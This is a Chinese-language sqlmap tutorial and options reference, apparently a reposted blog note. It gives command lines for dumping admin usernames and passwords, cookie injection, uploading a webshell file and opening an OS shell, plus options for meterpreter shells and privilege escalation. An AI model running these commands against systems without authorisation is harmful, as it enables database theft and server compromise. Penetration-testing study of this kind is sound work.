Sqlmap使用教程Sqlmap使用教程

sqlmap也是滲透中常用的一個注入工具，其實在注入工具方面，一個sqlmap就足夠用了，隻要你用的熟，秒殺各種工具，隻是一個便捷性問題，sql注入另一方面就是手工黨了，這個就另當别論了。

今天把我一直以來整理的sqlmap筆記釋出上來供大家參考。

<a href="http://www.vuln.cn/wp-content/uploads/2015/08/sqlmap.png" target="_blank"></a>

sqlmap支援五種不同的注入模式：

1、基于布爾的盲注，即可以根據傳回頁面判斷條件真假的注入。

2、基于時間的盲注，即不能根據頁面傳回内容判斷任何資訊，用條件語句檢視時間延遲語句是否執行（即頁面傳回時間是否增加）來判斷。

3、基于報錯注入，即頁面會傳回錯誤資訊，或者把注入的語句的結果直接傳回在頁面中。

4、聯合查詢注入，可以使用union的情況下的注入。

5、堆查詢注入，可以同時執行多條語句的執行時的注入。

MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB

sqlmap -u “http://www.vuln.cn/post.php?id=1″

預設使用level1檢測全部資料庫類型

sqlmap -u “http://www.vuln.cn/post.php?id=1″ –dbms mysql –level 3

指定資料庫類型為mysql，級别為3（共5級，級别越高，檢測越全面）

當注入頁面錯誤的時候，自動跳轉到另一個頁面的時候需要跟随302，

當注入錯誤的時候，先報錯再跳轉的時候，不需要跟随302。

目的就是：要追蹤到錯誤資訊。

當程式有防get注入的時候，可以使用cookie注入

sqlmap -u “http://www.baidu.com/shownews.asp” –cookie “id=11″ –level 2（隻有level達到2才會檢測cookie）

可以使用burpsuite或者temperdata等工具來抓取post包

sqlmap -r “c:\tools\request.txt” -p “username” –dbms mysql 指定username參數

sqlmap -u “http://www.vuln.cn/post.php?id=1″ –dbms mysql –level 3 –dbs

查詢有哪些資料庫

sqlmap -u “http://www.vuln.cn/post.php?id=1″ –dbms mysql –level 3 -D test –tables

查詢test資料庫中有哪些表

sqlmap -u “http://www.vuln.cn/post.php?id=1″ –dbms mysql –level 3 -D test -T admin –columns

查詢test資料庫中admin表有哪些字段

sqlmap -u “http://www.vuln.cn/post.php?id=1″ –dbms mysql –level 3 -D test -T admin -C “username,password” –dump

dump出字段username與password中的資料

其他指令參考下面

sqlmap -r “c:\tools\request.txt” –dbms mysql -D dedecms –search -C admin,password

在dedecms資料庫中搜尋字段admin或者password。

首先找需要網站的實體路徑，其次需要有可寫或可讀權限。

–file-read=RFILE 從後端的資料庫管理系統檔案系統讀取檔案 （實體路徑）

–file-write=WFILE 編輯後端的資料庫管理系統檔案系統上的本地檔案 （mssql xp_shell）

–file-dest=DFILE 後端的資料庫管理系統寫入檔案的絕對路徑

#示例：

sqlmap -r “c:\request.txt” -p id –dbms mysql –file-dest “e:\php\htdocs\dvwa\inc\include\1.php” –file-write “f:\webshell\1112.php”

使用shell指令：

sqlmap -r “c:\tools\request.txt” -p id –dms mysql –os-shell

接下來指定網站可寫目錄：

“E:\php\htdocs\dvwa”

#注：mysql不支援列目錄，僅支援讀取單個檔案。sqlserver可以列目錄，不能讀寫檔案，但需要一個（xp_dirtree函數）

–is-dba 目前使用者權限（是否為root權限）

–dbs 所有資料庫

–current-db 網站目前資料庫

–users 所有資料庫使用者

–current-user 目前資料庫使用者

–random-agent 構造随機user-agent

–passwords 資料庫密碼

–proxy http://local:8080 –threads 10 (可以自定義線程加速) 代理

–time-sec=TIMESEC DBMS響應的延遲時間（預設為5秒）

——————————————————————————————————

–version 顯示程式的版本号并退出

-h, –help 顯示此幫助消息并退出

-v VERBOSE 詳細級别：0-6（預設為1）

以下至少需要設定其中一個選項，設定目标URL。

-d DIRECT 直接連接配接到資料庫。

-u URL, –url=URL 目标URL。

-l LIST 從Burp或WebScarab代理的日志中解析目标。

-r REQUESTFILE 從一個檔案中載入HTTP請求。

-g GOOGLEDORK 處理Google dork的結果作為目标URL。

-c CONFIGFILE 從INI配置檔案中加載選項。

這些選項可以用來指定如何連接配接到目标URL。

–data=DATA 通過POST發送的資料字元串

–cookie=COOKIE HTTP Cookie頭

–cookie-urlencode URL 編碼生成的cookie注入

–drop-set-cookie 忽略響應的Set – Cookie頭資訊

–user-agent=AGENT 指定 HTTP User – Agent頭

–random-agent 使用随機標明的HTTP User – Agent頭

–referer=REFERER 指定 HTTP Referer頭

–headers=HEADERS 換行分開，加入其他的HTTP頭

–auth-type=ATYPE HTTP身份驗證類型（基本，摘要或NTLM）(Basic, Digest or NTLM)

–auth-cred=ACRED HTTP身份驗證憑據（使用者名:密碼）

–auth-cert=ACERT HTTP認證證書（key_file，cert_file）

–proxy=PROXY 使用HTTP代理連接配接到目标URL

–proxy-cred=PCRED HTTP代理身份驗證憑據（使用者名：密碼）

–ignore-proxy 忽略系統預設的HTTP代理

–delay=DELAY 在每個HTTP請求之間的延遲時間，機關為秒

–timeout=TIMEOUT 等待連接配接逾時的時間（預設為30秒）

–retries=RETRIES 連接配接逾時後重新連接配接的時間（預設3）

–scope=SCOPE 從所提供的代理日志中過濾器目标的正規表達式

–safe-url=SAFURL 在測試過程中經常通路的url位址

–safe-freq=SAFREQ 兩次通路之間測試請求，給出安全的URL

這些選項可以用來列舉後端資料庫管理系統的資訊、表中的結構和資料。此外，您還可以運作

您自己的SQL語句。

-b, –banner 檢索資料庫管理系統的辨別

–current-user 檢索資料庫管理系統目前使用者

–current-db 檢索資料庫管理系統目前資料庫

–is-dba 檢測DBMS目前使用者是否DBA

–users 枚舉資料庫管理系統使用者

–passwords 枚舉資料庫管理系統使用者密碼哈希

–privileges 枚舉資料庫管理系統使用者的權限

–roles 枚舉資料庫管理系統使用者的角色

–dbs 枚舉資料庫管理系統資料庫

-D DBname 要進行枚舉的指定資料庫名

-T TBLname 要進行枚舉的指定資料庫表（如：-T tablename –columns）

–tables 枚舉的DBMS資料庫中的表

–columns 枚舉DBMS資料庫表列

–dump 轉儲資料庫管理系統的資料庫中的表項

–dump-all 轉儲所有的DBMS資料庫表中的條目

–search 搜尋列（S），表（S）和/或資料庫名稱（S）

-C COL 要進行枚舉的資料庫列

-U USER 用來進行枚舉的資料庫使用者

–exclude-sysdbs 枚舉表時排除系統資料庫

–start=LIMITSTART 第一個查詢輸出進入檢索

–stop=LIMITSTOP 最後查詢的輸出進入檢索

–first=FIRSTCHAR 第一個查詢輸出字的字元檢索

–last=LASTCHAR 最後查詢的輸出字字元檢索

–sql-query=QUERY 要執行的SQL語句

–sql-shell 提示互動式SQL的shell

這些選項可用于優化SqlMap的性能。

-o 開啟所有優化開關

–predict-output 預測常見的查詢輸出

–keep-alive 使用持久的HTTP（S）連接配接

–null-connection 從沒有實際的HTTP響應體中檢索頁面長度

–threads=THREADS 最大的HTTP（S）請求并發量（預設為1）

這些選項可以用來指定測試哪些參數， 提供自定義的注入payloads和可選篡改腳本。

-p TESTPARAMETER 可測試的參數（S）

–dbms=DBMS 強制後端的DBMS為此值

–os=OS 強制後端的DBMS作業系統為這個值

–prefix=PREFIX 注入payload字元串字首

–suffix=SUFFIX 注入payload字元串字尾

–tamper=TAMPER 使用給定的腳本（S）篡改注入資料

這些選項可以用來指定在SQL盲注時如何解析和比較HTTP響應頁面的内容。

–level=LEVEL 執行測試的等級（1-5，預設為1）

–risk=RISK 執行測試的風險（0-3，預設為1）

–string=STRING 查詢時有效時在頁面比對字元串

–regexp=REGEXP 查詢時有效時在頁面比對正規表達式

–text-only 僅基于在文本内容比較網頁

這些選項可用于調整具體的SQL注入測試。

–technique=TECH SQL注入技術測試（預設BEUST）

–union-cols=UCOLS 定列範圍用于測試UNION查詢注入

–union-char=UCHAR 用于暴力猜解列數的字元

-f, –fingerprint 執行檢查廣泛的DBMS版本指紋

這些選項可以被用來運作蠻力檢查。

–common-tables 檢查存在共同表

–common-columns 檢查存在共同列

User-defined function injection（使用者自定義函數注入）：

這些選項可以用來建立使用者自定義函數。

–udf-inject 注入使用者自定義函數

–shared-lib=SHLIB 共享庫的本地路徑

這些選項可以被用來通路後端資料庫管理系統的底層檔案系統。

–file-read=RFILE 從後端的資料庫管理系統檔案系統讀取檔案

–file-write=WFILE 編輯後端的資料庫管理系統檔案系統上的本地檔案

這些選項可以用于通路後端資料庫管理系統的底層作業系統。

–os-cmd=OSCMD 執行作業系統指令

–os-shell 互動式的作業系統的shell

–os-pwn 擷取一個OOB shell，meterpreter或VNC

–os-smbrelay 一鍵擷取一個OOB shell，meterpreter或VNC

–os-bof 存儲過程緩沖區溢出利用

–priv-esc 資料庫程序使用者權限提升

–msf-path=MSFPATH Metasploit Framework本地的安裝路徑

–tmp-path=TMPPATH 遠端臨時檔案目錄的絕對路徑

這些選項可以被用來通路後端資料庫管理系統Windows系統資料庫。

–reg-read 讀一個Windows系統資料庫項值

–reg-add 寫一個Windows系統資料庫項值資料

–reg-del 删除Windows系統資料庫鍵值

–reg-key=REGKEY Windows系統資料庫鍵

–reg-value=REGVAL Windows系統資料庫項值

–reg-data=REGDATA Windows系統資料庫鍵值資料

–reg-type=REGTYPE Windows系統資料庫項值類型

這些選項可以用來設定一些一般的工作參數。

-t TRAFFICFILE 記錄所有HTTP流量到一個文本檔案中

-s SESSIONFILE 儲存和恢複檢索會話檔案的所有資料

–flush-session 重新整理目前目标的會話檔案

–fresh-queries 忽略在會話檔案中存儲的查詢結果

–eta 顯示每個輸出的預計到達時間

–update 更新SqlMap

–save file儲存選項到INI配置檔案

–batch 從不詢問使用者輸入，使用所有預設配置。

–beep 發現SQL注入時提醒

–check-payload IDS對注入payloads的檢測測試

–cleanup SqlMap具體的UDF和表清理DBMS

–forms 對目标URL的解析和測試形式

–gpage=GOOGLEPAGE 從指定的頁碼使用谷歌dork結果

–page-rank Google dork結果顯示網頁排名（PR）

–parse-errors 從響應頁面解析資料庫管理系統的錯誤消息

–replicate 複制轉儲的資料到一個sqlite3資料庫

–tor 使用預設的Tor（Vidalia/ Privoxy/ Polipo）代理位址

–wizard 給初級使用者的簡單向導界面

本文轉自 元嬰期 51CTO部落格，原文連結:本文轉自 元嬰期 51CTO部落格，原文連結: